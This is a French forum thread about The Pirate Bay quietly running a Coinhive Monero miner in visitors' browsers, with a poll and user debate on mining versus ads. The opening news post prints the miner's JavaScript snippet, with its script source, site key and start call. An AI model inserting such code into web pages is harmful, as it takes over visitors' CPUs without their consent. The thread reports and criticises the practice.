Affichage des résultats du sondage: Seriez-vous prêt à miner de la cryptomonnaie afin de surfer sans publicité sur un site ?

Votants
32. Vous ne pouvez pas participer à ce sondage.
  • Oui, je suis prêt à miner pour un site afin de surfer sans pub.

    10 31,25%
  • Non, je préfère garder mes ressources et surfer avec des pubs.

    17 53,13%
  • Je n’ai pas d’avis.

    5 15,63%
+ Répondre à la discussion Actualité déjà publiée
Page 1 sur 2 12 DernièreDernière
  1. #1
    Chroniqueur Actualités

    Homme Profil pro
    Webmaster
    Inscrit en
    janvier 2014
    Messages
    712
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Côte d'Ivoire

    Informations professionnelles :
    Activité : Webmaster
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : janvier 2014
    Messages : 712
    Points : 15 942
    Points
    15 942

    Par défaut Seriez-vous prêt à miner de la monnaie cryptographique afin de surfer sans publicité sur un site ?

    Seriez-vous prêt à miner de la cryptomonnaie sur un site afin de surfer sans publicité sur ce site ?
    The Pirate Bay a adopté ce modèle économique pour assurer sa survie

    Dans le monde des sites de partage de fichiers en pair à pair, The pirate Bay occupe une place de choix. Classé par Alexa 88e au niveau mondial et 54e aux États-Unis pour ce qui concerne les sites les plus populaires, The Pirate Bay qui propose à lui seul l’un des gros tracker BitTorrent au monde a encore trouvé le moyen de faire parler de lui.

    Il y a quelques jours de cela, certains internautes ont commencé à sentir une montée en flèche de l’utilisation de leurs processeurs alors qu’ils visitaient certaines pages du site thepiratebay.org. Bien évidemment, les plaintes ont commencé à fuser de toute part. Après avoir effectué des recherches, les internautes ont découvert que sous le pied de page du site web se trouvait un code JavaScript qui utilisait les ressources des machines des visiteurs pour miner pour la chaîne des blocs Monero.

    Pour les personnes non familières à l’environnement des monnaies cryptographiques, il faut savoir que lorsqu’un utilisateur effectue une transaction comme un paiement avec une monnaie cryptographique, ce paiement s’ajoute aux autres transactions dans les blocs d’un réseau appelé chaîne des blocs afin d’être validé. Les systèmes de paiements des monnaies cryptographiques étant décentralisés, pour que chaque transaction puisse être validée, l’on peut utiliser les ressources d’une machine situées n’importe où sur la planète pour traiter à distance l’algorithme de hachage nécessaire à valider les transactions des blocs dans la chaîne des blocs.

    Certains utilisateurs qui souhaitent se faire un peu d’argent n’hésitent donc pas à mettre les ressources de leurs terminaux (CPU, GPU, les technologies FPGA ou ASIC ou d’autres ressources encore) afin de miner une monnaie moyennant de faibles paiements. Mais dans le cas du site The Pirate Bay, ses administrateurs ont intégré dans la page du site un script à l’insu des utilisateurs afin de miner pour le système de paiement pair-à-pair Monero, d’où le mécontentement de certains utilisateurs. Le script est fourni par la plateforme Coinhive et se présente comme suit :

    Code JavaScript : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    <script src="<a href="https://coin-hive.com/lib/coinhive.min.js" target="_blank">https://coin-hive.com/lib/coinhive.min.js</a>"></script>
     
    <script>var miner = new CoinHive.Anonymous('xP9YtM7sFtCRhh1H2SJGWl60Z0BgbpHy', { throttle: 0.9 });
     
    miner.start();</script>

    Pour régler le problème qui venait d’être constaté, certains utilisateurs ont décidé d’utiliser l’extension NoScript dans leur navigateur afin de désactiver JavaScript et de marquer The Pirate Bay comme un site qui n’est pas digne de confiance. Face à ces actions occasionnées par une décision prise unilatéralement par le site, les administrateurs de The Pirate Bay n’ont pas eu d’autres choix que de sortir de leur silence et ont fait cette communication :

    « Comme vous l’avez peut-être remarqué, nous testons un mineur Monero JavaScript. Ceci est seulement un test. Nous voulons vraiment nous débarrasser de toutes les publicités. Mais nous avons également besoin d’argent pour maintenir le site en cours d’exécution.
    Faites-nous savoir ce que vous pensez dans les commentaires. Voulez-vous des annonces ou voulez-vous donner quelques-uns de vos cycles de processeur chaque fois que vous visitez le site ? Bien sûr, le minage peut être bloqué par un bloqueur publicitaire normal. »

    À la suite de cette annonce, le site précise ceci :

    « Initialement, il y avait une petite erreur de frappe en sorte que tous les processeurs d’un client furent utilisés. Cela devrait être corrigé maintenant, donc seulement 20 à 30 % devraient être utilisés. De plus, il est réduit à fonctionner dans un seul onglet. Même si vous avez 10 onglets, il ne s’exécutera que dans un seul. »

    Après que le nouveau modèle économique sur lequel le site compte s’appuyer pour rentabiliser ses activités et maintenir sa survie a été présenté, en lieu et place des publicités qui pour certaines donnent sur des pages pornographiques, de nombreux utilisateurs n’ont pas manqué d’apporter leur soutien en affirmant que si ce moyen permet de soutenir le site, ils sont partants. Un utilisateur souligne que « nous n’aurons aucun problème à partager quelques processus de notre CPU pour le site le plus résilient de la Galaxy… Ayant été ici pendant de nombreuses années, au moins nous pourrions faire ceci pour TPB… : 20 à 30 % ne seront pas assez importants pour la plupart des utilisateurs. »

    Un autre également estime que l’idée est intéressante. Mais ce dernier ajoute que « cependant, garder les utilisateurs informés est essentiel. Donner aux utilisateurs enregistrés la possibilité de choisir entre les publicités et le minage peut également être viable (bien que la plupart d’entre eux bloquent probablement les publicités). Avoir plus d’options pour contribuer est une excellente idée ! Je serai heureux de contribuer en fournissant une partie de mon CPU lors de la visite sur TPB (par opposition aux annonces, je ne les aime pas particulièrement en raison de problèmes de confidentialité). »

    Avec ce nouveau modèle économique, d’autres sites pourraient emboîter le pas en proposant aux utilisateurs d’utiliser leurs machines pour miner de la monnaie cryptographique au lieu de s’appuyer sur les publicités pour assurer leur survie. Les avis sur cette approche étant variables, seriez-vous prêt à miner de la monnaie sur un site si ce dernier s’engageait à supprimer les publicités ?


    Source : The Pirate Bay

    Et vous ?

    Seriez-vous prêt à offrir vos ressources pour miner pour un site afin de le soutenir ?

    Entre miner de la monnaie cryptographique pour surfer sans publicité sur un site ou surfer avec des publicités sur celui-ci, quelle est votre préférence ?

    Voir aussi

    Kaspersky rapporte que 1,65 million de machines ont déjà été infectées en 2017 par des logiciels malveillants de minage, contre 1,8 million en 2016
    Un logiciel « silencieusement » installé avec uTorrent exploite la puissance inutilisée des processeurs pour faire du minage de Bitcoin
    Des appareils Raspberry Pi détournés par un malware Linux pour le minage de cryptomonnaie, les appareils sont ajoutés à un botnet
    Contribuez au club : Corrections, suggestions, critiques, ... : Contactez le service news et Rédigez des actualités

  2. #2
    Membre expert
    Avatar de RyzenOC
    Homme Profil pro
    NR
    Inscrit en
    juin 2013
    Messages
    3 309
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Suisse

    Informations professionnelles :
    Activité : NR
    Secteur : Aéronautique - Marine - Espace - Armement

    Informations forums :
    Inscription : juin 2013
    Messages : 3 309
    Points : 3 776
    Points
    3 776
    Billets dans le blog
    8

    Par défaut minage sur cpu vraiment ?

    le script fait du minage sur cpu

    NoScript je l'utilise, parceque au final quand tu regarde bien le JS n'apporte rien dans la plupart des sites web si ce n'est ce genre d'emmerde.
    Un exemple tous bête, developpez.net activer ou pas le js n'apporte rien de plus dans l'expérience utilisateur.
    =>Comment jouer sur xbox one à moindre coût ?
    Achetez un notebook de 2010 à 50€ sur leboncoin, installez steam, connectez le pc à un écran, branchez une manette xbox au pc
    Enjoy

  3. #3
    Membre éprouvé
    Homme Profil pro
    Développeur informatique
    Inscrit en
    février 2010
    Messages
    771
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 36
    Localisation : France, Seine Maritime (Haute Normandie)

    Informations professionnelles :
    Activité : Développeur informatique
    Secteur : Enseignement

    Informations forums :
    Inscription : février 2010
    Messages : 771
    Points : 1 040
    Points
    1 040

    Par défaut

    Pas tout à fait d'accord. Javascript est très utilisé aujourd'hui dans les User Interface (responsive, fenêtres modales, formulaires, navigation, carrousels, etc...). Le désactiver sur certains sites empêcherait de surfer correctement. Mais plutôt que de miner les bitcoins et autres altcoins, dont l'impact environnemental est une catastrophe pour la planète, ils devraient miner de la monnaie libre qui permet d'avoir une économie libre.
    L'informatique fait gagner beaucoup de temps. A condition d'en avoir beaucoup devant soi !!!

  4. #4
    Expert éminent
    Avatar de transgohan
    Homme Profil pro
    Développeur Temps réel Embarqué
    Inscrit en
    janvier 2011
    Messages
    2 262
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Maine et Loire (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur Temps réel Embarqué

    Informations forums :
    Inscription : janvier 2011
    Messages : 2 262
    Points : 6 119
    Points
    6 119

    Par défaut

    Citation Envoyé par paidge Voir le message
    Pas tout à fait d'accord. Javascript est très utilisé aujourd'hui dans les User Interface (responsive, fenêtres modales, formulaires, navigation, carrousels, etc...). Le désactiver sur certains sites empêcherait de surfer correctement. Mais plutôt que de miner les bitcoins et autres altcoins, dont l'impact environnemental est une catastrophe pour la planète, ils devraient miner de la monnaie libre qui permet d'avoir une économie libre.
    En quoi cette dernière est-elle différente d'un point de vue environnementale ?
    Toujours se souvenir que la majorité des ennuis viennent de l'espace occupé entre la chaise et l'écran de l'ordinateur.

  5. #5
    Membre à l'essai
    Inscrit en
    septembre 2008
    Messages
    4
    Détails du profil
    Informations forums :
    Inscription : septembre 2008
    Messages : 4
    Points : 12
    Points
    12

    Par défaut Peste ou choléra?

    Citation Envoyé par RyzenOC Voir le message
    Un exemple tous bête, developpez.net activer ou pas le js n'apporte rien de plus dans l'expérience utilisateur.
    N'en déplaise au webmaster, c'est pas non plus un site qui peut se mesurer en termes de fonctionnalités à d'autres.
    Le JS est souvent utile pour les rendus avancés, l'interaction poussée, les sites "One page", la réactivité par exemple pour remplir des paniers, la limitation des refresh...

    D'autre part, il faut bien que les sites web soient rémunérés. Aucun modèle "gratuit" ne peut durer éternellement. Le modèle basée sur la pub est en train de s'auto-asphyxier, des sommes colossales sont dépensées dans le marketing électronique pour un résultat dont j'ai peine à croire qu'il soit positif. Finalement, la présence sur le web est incontournable pour une société plus pour éviter d'être oubliée que pour réussir à capter des clients.

    A choisir entre me faire manger les perfs et la BP par les pubs et la cryptomonnaie, je choisis la crypto monnaie qui me semble moins intrusive...

    Quand à l'impact environnemental... le surf, le jeu vidéo, les smartphones, Netflix, les NAS, le téléchargement illégal ... Tout ceci a un impact environnemental et surtout énergétique qui tend à rendre insoluble l'abandon des énergies fossiles.

  6. #6
    Nouveau membre du Club
    Homme Profil pro
    Développeur alternant
    Inscrit en
    mars 2015
    Messages
    14
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 24
    Localisation : France, Loire Atlantique (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur alternant
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : mars 2015
    Messages : 14
    Points : 35
    Points
    35

    Par défaut

    Je trouve le concept très intéressant.
    Pour un projet, je cherchais un modèle financier, je voulais rester sur un site gratuit, mais je suis contre les pubs, la seule option que je voyais était de proposer aux utilisateurs de faire des dons comme pour Wikipédia. Grâce à cette idée, il est possible d'avoir un site gratuit pour les utilisateurs et qui respecte mes valeurs anti-pub intrusive.

    Par contre, je suis vraiment contre le principe de m'être ça en place sans prévenir les utilisateurs, TPB aurait dû le faire dés le début, et non pas attendre que ce soit découvert.

  7. #7
    Rédacteur/Modérateur

    Avatar de Songbird_
    Homme Profil pro
    Bidouilleur
    Inscrit en
    juin 2015
    Messages
    352
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 19
    Localisation : France, Ardennes (Champagne Ardenne)

    Informations professionnelles :
    Activité : Bidouilleur
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : juin 2015
    Messages : 352
    Points : 2 673
    Points
    2 673
    Billets dans le blog
    3

    Par défaut

    Quand à l'impact environnemental... le surf, le jeu vidéo, les smartphones, Netflix, les NAS, le téléchargement illégal ... Tout ceci a un impact environnemental et surtout énergétique qui tend à rendre insoluble l'abandon des énergies fossiles.
    Pourquoi préciser "illégal" ? Le téléchargement, illégal ou non, a un impact.
    Avant de poster: FAQ Rust(WIP); FAQ Dart; FAQ Java; FAQ JavaFX.
    Vous souhaiteriez vous introduire au langage Rust ? C'est par ici ou ici !
    Une question à propos du langage ? N'hésitez pas à vous rendre sur le forum !

    N'hésitez pas à contribuer ou nous faire part de vos retours !
    Release Rust FAQ #7


    Ninja Gaiden meets Metal.

  8. #8
    Membre du Club
    Inscrit en
    octobre 2006
    Messages
    53
    Détails du profil
    Informations forums :
    Inscription : octobre 2006
    Messages : 53
    Points : 53
    Points
    53

    Par défaut

    Personellement totalement pour, je deteste les pubs... surtout les pubs visees de nos jours...
    Apres que le visiteur puisse regler eventuellement le niveau de participation CPU voir le bloquer completement pourquoi pas.

    @RyzenOC moi qui fait regulierement du dev Angular ou React, si pas de JS pas de site website... Apres developpez.net c'est pas vraiment un bon exemple ^^ c'est tres old school ce site...

  9. #9
    Membre expérimenté
    Inscrit en
    juin 2009
    Messages
    604
    Détails du profil
    Informations forums :
    Inscription : juin 2009
    Messages : 604
    Points : 1 731
    Points
    1 731

    Par défaut

    Citation Envoyé par GPZ{^_^} Voir le message
    Personellement totalement pour, je deteste les pubs... surtout les pubs visees de nos jours...
    Apres que le visiteur puisse regler eventuellement le niveau de participation CPU voir le bloquer completement pourquoi pas.

    @RyzenOC moi qui fait regulierement du dev Angular ou React, si pas de JS pas de site website... Apres developpez.net c'est pas vraiment un bon exemple ^^ c'est tres old school ce site...
    Bien sûr, on fait tout et n'importe quoi avec du JS, mais surtout pas ce pour quoi il a été créée. C'est pour ça que c'est le bordel ce langage et qu'il donne envie de vomir à pas mal de monde.

    Quand j'ai appris le web, niveau ergonomie, on m'a toujours dit que le JS devait être 100% optionnel. Force est de constater que cette bonne pratique est largement perdue... Pour faire quoi? Des onglets web qui consomment 150 mo de ram...

  10. #10
    Membre éprouvé
    Homme Profil pro
    Développeur informatique
    Inscrit en
    février 2010
    Messages
    771
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 36
    Localisation : France, Seine Maritime (Haute Normandie)

    Informations professionnelles :
    Activité : Développeur informatique
    Secteur : Enseignement

    Informations forums :
    Inscription : février 2010
    Messages : 771
    Points : 1 040
    Points
    1 040

    Par défaut

    Citation Envoyé par transgohan Voir le message
    En quoi cette dernière est-elle différente d'un point de vue environnementale ?
    En fait c'est la création monétaire qui est différente. Il n'y a pas de course à la puissance pour maintenir la blockchain de la monnaie libre. Dans ce cas, la monnaie est co-créée par ses utilisateurs et ce n'est pas le fait de fournir de la puissance de calcul au réseau qui fait que ton compte sera crédité Une différence fondamentale
    L'informatique fait gagner beaucoup de temps. A condition d'en avoir beaucoup devant soi !!!

  11. #11
    Rédacteur/Modérateur

    Homme Profil pro
    Network game programmer
    Inscrit en
    juin 2010
    Messages
    4 560
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 30
    Localisation : Royaume-Uni

    Informations professionnelles :
    Activité : Network game programmer

    Informations forums :
    Inscription : juin 2010
    Messages : 4 560
    Points : 18 255
    Points
    18 255

    Par défaut

    Citation Envoyé par GPZ{^_^} Voir le message
    voir le bloquer completement pourquoi pas.
    Un moment donné, ils le disent eux-mêmes, faut bien qu'ils aient un revenu pour faire vivre le site. Les serveurs, le dév et autres doivent être payés. Donc si tu bloques la pub et le minage... tu préfèrerais donc payer un abonnement ?

    Pour ma part, la pub, si elle n'est pas abusive ou "borderline" (les grosses pop-up de cul et autres), ne me dérangent pas. Si le site abuse, je n'utilise plus ce site.
    Utiliser un peu de CPU quand je visite un site, je trouve que c'est une alternative très correcte afin de garder un site gratuit.
    Au moins ils cherchent des alternatives à la surenchère de la pub.

    Sérieux en 2017 je ne comprends même pas qu'un annonceur paye encore pour faire de la pub sur internet : soit elle est ciblée et stupide (coucou amazon qui met dans ses encarts de pub le produit que je viens d'acheter), soit éronnée ou inutile (je n'ai jamais vu une pub en me disant "ouah merci, j'avais justement besoin de ça"), soit masquée dans un bordel de pubs dans tous les sens et invisibles.
    Pensez à consulter la FAQ ou les cours et tutoriels de la section C++.
    Un peu de programmation réseau ?
    Aucune aide via MP ne sera dispensée. Merci d'utiliser les forums prévus à cet effet.

  12. #12
    Rédacteur/Modérateur

    Avatar de Songbird_
    Homme Profil pro
    Bidouilleur
    Inscrit en
    juin 2015
    Messages
    352
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 19
    Localisation : France, Ardennes (Champagne Ardenne)

    Informations professionnelles :
    Activité : Bidouilleur
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : juin 2015
    Messages : 352
    Points : 2 673
    Points
    2 673
    Billets dans le blog
    3

    Par défaut

    Sérieux en 2017 je ne comprends même pas qu'un annonceur paye encore pour faire de la pub sur internet : soit elle est ciblée et stupide (coucou amazon qui met dans ses encarts de pub le produit que je viens d'acheter), soit éronnée ou inutile (je n'ai jamais vu une pub en me disant "ouah merci, j'avais justement besoin de ça"), soit masquée dans un bordel de pubs dans tous les sens et invisibles.
    J'y vois un réel un intérêt, de payer encore pour de la publicité. Le fait que les annonces ne te correspondent pas totalement (cf. l'exemple que tu as donné concernant amazon, qui semble assez courant d'ailleurs) n'est pas important. L'important est de voir qui est le vendeur. Cela donne toujours de la visibilité au vendeur (et donc à l'entreprise) et ça reste le plus important. Pourquoi ? Parce que le jour où tu voudras acheter quelque chose (sauf si tu fait très attention à qui tu achètes) qui est dans leurs cordes, tu achèteras à celui que tu vois le plus souvent (dans les résultats).

    Bien entendu, des petites entreprises qui paient des plateformes pour placer leur publicité n'ont que peu d'intérêt à le faire puisque ça sera le plus offrant qui aura le plus de "temps de passage" sur les pages que tu visites et elles ne seront (sauf fonds de départ très importants) jamais retenues faute de moyens. Je me risquerais presque à dire que les annonceurs emploient les mêmes techniques qu'à la télévision: on se fiche (ou presque) que le produit ne t'intéresse pas, l'important est que tu retiennes qui (et comment il te) le vend.
    Avant de poster: FAQ Rust(WIP); FAQ Dart; FAQ Java; FAQ JavaFX.
    Vous souhaiteriez vous introduire au langage Rust ? C'est par ici ou ici !
    Une question à propos du langage ? N'hésitez pas à vous rendre sur le forum !

    N'hésitez pas à contribuer ou nous faire part de vos retours !
    Release Rust FAQ #7


    Ninja Gaiden meets Metal.

  13. #13
    Membre régulier
    Homme Profil pro
    Ingénieur systèmes et réseaux
    Inscrit en
    janvier 2011
    Messages
    51
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 64
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Ingénieur systèmes et réseaux
    Secteur : Conseil

    Informations forums :
    Inscription : janvier 2011
    Messages : 51
    Points : 94
    Points
    94

    Par défaut

    La pub maintenant n'a plus aucun intérêt.

    Quand j'ai acheté un produit, ce n'est plus la peine de m'en faire la pub, il est trop tard. Donc la carte vidéo que j'ai achetée la semaine dernière sur Ebay et reçue aujourd'hui, c'est plus la peine de me la proposer dans les pages Ebay, j'en achèterai pas un camion.

    Quand à laissé quiconque utiliser mes systèmes sans autorisation ou contrôle, il n'en est pas question sans que je sois au courant.

  14. #14
    Membre habitué Avatar de ouistitis
    Profil pro
    Développeur informatique
    Inscrit en
    mars 2009
    Messages
    77
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : Développeur informatique
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : mars 2009
    Messages : 77
    Points : 169
    Points
    169

    Par défaut

    Le minage, pourquoi pas, à condition d'être bien informé.

    La pub, il y en a beaucoup trop.
    *** Ouistitis ***
    « Le vrai danger, ce n'est pas quand les ordinateurs penseront comme les hommes,
    c'est quand les hommes penseront comme les ordinateurs. » Sydney Justin Harris

  15. #15
    Membre actif
    Profil pro
    Développeur informatique
    Inscrit en
    décembre 2013
    Messages
    98
    Détails du profil
    Informations personnelles :
    Localisation : France, Var (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Développeur informatique
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : décembre 2013
    Messages : 98
    Points : 231
    Points
    231

    Par défaut

    Si on se fie à ce site : https://digiconomist.net/bitcoin-energy-consumption (ce que semble faire developpez.net), une transaction bitcoin consomme plus de 200kWh, c'est à dire plusieurs dizaines d'€ en plus sur la facture d'électricité chaque seconde (en admettant que ce soit le temps d'une transaction) de présence, ça fait chère l'accès non ? surtout que ça leur rapporte sûrement bien moins à TPB, vive l'écologie... "Heureusement" que c'est de la grosse désinformation.

    Plus sérieusement, il serai souhaitable de connaître la consommation supplémentaire réelle d'électricité qu'engendre un minage et le temps qu'il dure. Il serai également souhaitable que ce système (s'il s'avère viable) serve bien de modèle économique pour faire vivre le web mais sous une forme peut être plus saine que le bitcoin, c'est à dire le calcul distribué pour la science ou autre besoin à grande échelle et que ce soit financé par l'état.

    En tout cas on a encore la preuve que Javascript a bien trop de pouvoir sur nos machines pour qu'on lui fasse confiance, n'importe quel site peut à tout moment modifier ses scripts et en plus si ça dure très peu de temps (quelques secondes) personne s'en apercevra.

  16. #16
    Membre éprouvé

    Homme Profil pro
    Privacy, EBusiness, Bases de données, Sécurité, ...
    Inscrit en
    novembre 2004
    Messages
    269
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Belgique

    Informations professionnelles :
    Activité : Privacy, EBusiness, Bases de données, Sécurité, ...
    Secteur : Service public

    Informations forums :
    Inscription : novembre 2004
    Messages : 269
    Points : 952
    Points
    952

    Par défaut

    Citation Envoyé par Songbird_ Voir le message
    J'y vois un réel un intérêt, de payer encore pour de la publicité. Le fait que les annonces ne te correspondent pas totalement (cf. l'exemple que tu as donné concernant amazon, qui semble assez courant d'ailleurs) n'est pas important. L'important est de voir qui est le vendeur. Cela donne toujours de la visibilité au vendeur (et donc à l'entreprise) et ça reste le plus important. Pourquoi ? Parce que le jour où tu voudras acheter quelque chose (sauf si tu fait très attention à qui tu achètes) qui est dans leurs cordes, tu achèteras à celui que tu vois le plus souvent (dans les résultats).

    Bien entendu, des petites entreprises qui paient des plateformes pour placer leur publicité n'ont que peu d'intérêt à le faire puisque ça sera le plus offrant qui aura le plus de "temps de passage" sur les pages que tu visites et elles ne seront (sauf fonds de départ très importants) jamais retenues faute de moyens. Je me risquerais presque à dire que les annonceurs emploient les mêmes techniques qu'à la télévision: on se fiche (ou presque) que le produit ne t'intéresse pas, l'important est que tu retiennes qui (et comment il te) le vend.
    Dès lors on voit toujours les mêmes annonceurs, ceux qui ont les moyens. Les PME et les starters ont peu de chance d'être vu.
    Et si tu fais une recherche sur un type de produit, même problème, le moteur de recherche te mets dans les premiers : ceux qui lui rapporte le plus en pub.

    Pour moi, la pub sur Internet ne sert que les grosses boites. Elle est le plus souvent nuisible aux PME et aux starters, car son seuil d'accès est trop couteux pour eux.
    La pub Internet, c'est World Wide et le marché de la PME, il est local.
    La PME doit donc faire sa pub en local (vers les bonnes cibles en tout cas et pas tout azimut sur le net) pour les services qu'elle peut proposer sur le web. Ses éventuelles dépenses de pub sur Internet, c'est de l'argent gaspillé.
    Pour les Startup, l'approche est différente et doit tenir compte des buts et des marchés visés, mais surtout pas une campagne pub "nimp".

    Donc sauf exception pour certains sites (DVP e.a.) la pub ne passe pas dans mon navigateur, ni les web-bug et autres traceurs (cookies tiers, cdn, ...)

    Maintenant, il y a certains sites communautaires qui peuvent avoir besoin de financement (ex.: Wikipedia ou The Pirate Bay, mais pensons aussi à la Croix Rouge, Médecins sans frontières et autres...)
    Pour des sites à but non lucratif, je suis dubitatif sur le moyen de financement par le minage de BitCoins.
    Je pense que si la Croix Rouge Internationale proposait cela, ce serait très mal perçu.
    Par contre si elle proposait de partager (raisonnablement) mon temps de CPU et mon volume de data (bof il est théoriquement non limité - sauf en très petits caractères) pour un but louable qui lui procurerait un revenu, cela rencontrerait, j'en suis persuadé, une adhésion certaine. Puisqu'en effet, ça ne me coute qu'un peu d'électricité, un % minime de temps de processeur et de data. Je ne débourse donc quasiment rien et j'aide une institution respectable. Donc une solution Win-Win.

    The Pirate Bay n'a-t-il pas d'autres pistes que le bitcoin pour pomper les ressources de ses utilisateurs ?
    Ce serait un peu moins polémique.

    Encore faudrait-il que les demandeurs potentiels acceptent un client comme TPB.
    J'imagine qu'un service météo accepte d'étendre sa puissance de calcul en partenariat avec la Croix Rouge Internationale.
    J'imagine moins " Votre météo du jour vous est offerte par <The Pirate Bay> " sur un média officiel.

  17. #17
    Membre éprouvé

    Homme Profil pro
    Privacy, EBusiness, Bases de données, Sécurité, ...
    Inscrit en
    novembre 2004
    Messages
    269
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Belgique

    Informations professionnelles :
    Activité : Privacy, EBusiness, Bases de données, Sécurité, ...
    Secteur : Service public

    Informations forums :
    Inscription : novembre 2004
    Messages : 269
    Points : 952
    Points
    952

    Par défaut

    Citation Envoyé par Songbird_ Voir le message
    J'y vois un réel un intérêt, de payer encore pour de la publicité. Le fait que les annonces ne te correspondent pas totalement (cf. l'exemple que tu as donné concernant amazon, qui semble assez courant d'ailleurs) n'est pas important. L'important est de voir qui est le vendeur. Cela donne toujours de la visibilité au vendeur (et donc à l'entreprise) et ça reste le plus important. Pourquoi ? Parce que le jour où tu voudras acheter quelque chose (sauf si tu fait très attention à qui tu achètes) qui est dans leurs cordes, tu achèteras à celui que tu vois le plus souvent (dans les résultats).

    Bien entendu, des petites entreprises qui paient des plateformes pour placer leur publicité n'ont que peu d'intérêt à le faire puisque ça sera le plus offrant qui aura le plus de "temps de passage" sur les pages que tu visites et elles ne seront (sauf fonds de départ très importants) jamais retenues faute de moyens. Je me risquerais presque à dire que les annonceurs emploient les mêmes techniques qu'à la télévision: on se fiche (ou presque) que le produit ne t'intéresse pas, l'important est que tu retiennes qui (et comment il te) le vend.
    +1
    Ça c'est l'intérêt du publiciste.
    • Est-ce celui du client ?
    • Est-ce celui des PME ?
    Je ne pense pas que cela soit le cas, comme tu le fais remarquer.
    Mais ce n'est que mon avis, basé sur plus de 30 ans d’expérience des PME, et surtout des TPE.
    Les PME ont rarement intérêt à investir dans la pub sur Internet.
    Et d'ailleurs ont-elles les moyens et un retour un investissement ? Le plus souvent, c'est négatif.

  18. #18
    Chroniqueur Actualités

    Homme Profil pro
    Administrateur de base de données
    Inscrit en
    mars 2013
    Messages
    3 023
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Canada

    Informations professionnelles :
    Activité : Administrateur de base de données

    Informations forums :
    Inscription : mars 2013
    Messages : 3 023
    Points : 67 745
    Points
    67 745

    Par défaut The Pirate Bay recommence à se servir d'un mineur de monnaie électronique sur son site

    The Pirate Bay recommence à se servir d'un mineur de monnaie électronique sur son site,
    sans prévenir les utilisateurs

    Le mois dernier, certains internautes ont commencé à sentir une montée en flèche de l’utilisation de leurs processeurs alors qu’ils visitaient certaines pages du site thepiratebay.org. Après avoir effectué des recherches, les internautes ont découvert que sous le pied de page du site web se trouvait un code JavaScript qui utilisait les ressources des machines des visiteurs pour miner pour la chaîne des blocs Monero.

    Pour régler le problème qui venait d’être constaté, certains utilisateurs ont décidé d’utiliser l’extension NoScript dans leur navigateur afin de désactiver JavaScript et de marquer The Pirate Bay comme un site qui n’est pas digne de confiance. Face à ces actions occasionnées par une décision prise unilatéralement par le site, les administrateurs de The Pirate Bay n’ont pas eu d’autres choix que de sortir de leur silence et ont fait cette communication :

    « Comme vous l’avez peut-être remarqué, nous testons un mineur Monero JavaScript. Ceci est seulement un test. Nous voulons vraiment nous débarrasser de toutes les publicités. Mais nous avons également besoin d’argent pour maintenir le site en cours d’exécution.
    Faites-nous savoir ce que vous pensez dans les commentaires. Voulez-vous des annonces ou voulez-vous donner quelques-uns de vos cycles de processeur chaque fois que vous visitez le site ? Bien sûr, le minage peut être bloqué par un bloqueur publicitaire normal. »

    À la suite de cette annonce, le site précise ceci :

    « Initialement, il y avait une petite erreur de frappe en sorte que tous les processeurs d’un client furent utilisés. Cela devrait être corrigé maintenant, donc seulement 20 à 30 % devraient être utilisés. De plus, il est réduit à fonctionner dans un seul onglet. Même si vous avez 10 onglets, il ne s’exécutera que dans un seul. »

    Le site n’a donc testé l'option que brièvement, mais cela a suffi à inspirer beaucoup d'autres à suivre. Cependant, quelques semaines plus tard, The Pirate Bay a remis le couvert.

    Le mineur n'est pas directement intégré dans le code principal du site, mais passe par un script d'annonce. De nombreux bloqueurs de publicités et outils anti-logiciels malveillants arrêtent ces requêtes, mais les utilisateurs qui ne s’en servent pas verront un pic d'utilisation du processeur lorsqu'ils accèdent au site. TF note néanmoins que le mineur semble être limité dans une certaine mesure, de sorte que la plupart des utilisateurs ne vont même pas remarqué qu’il est en activité.


    TF rappelle qu’exécuter un mineur de cryptomonnaie tel que le script Coin-Hive que The Pirate Bay utilise n'est pas sans risque : les plaintes des utilisateurs mises à part, il y a un problème qui pourrait rendre le fonctionnement du site plus difficile à l'avenir.

    En effet, la semaine dernière, TF a signalé que Cloudflare, le fournisseur de CDN, avait suspendu le compte du proxy torrent ProxyBunker, identifiant son mineur comme un logiciel malveillant. Cela signifie que The Pirate Bay prend le risque de voir son compte au service Cloudflare suspendu, bien qu’il dépend entre autres de lui pour se protéger contre les attaques de type DDoS.

    La suspension de ProxyBunker par Cloudflare s'est produite même si le site fournissait aux utilisateurs une option pour désactiver le mineur. Cette fonctionnalité a été implémentée par Coinhive après que le script a été mal utilisé par certains sites, qui l'ont lancé sans alerter ses utilisateurs.

    The Pirate Bay n'offre actuellement aucune option pour la désactiver et n’a pas encore prévenu ses utilisateurs qu’il y a nouveau recours. L’équipe n’ayant fait aucune communication dessus, il n’est donc pas clair s’il s’agit là d’un nouveau test ou de la mise en place effective d’une source de revenus alternative.

    Rappelons qu'Adblock Plus a sauté sur le manque de communication du site pour déployer un filtre sur son extension afin de protéger les utilisateurs du minage de monnaie électronique.

    Source : TF

    Et vous ?

    Qu'en pensez-vous ?

    Voir aussi :

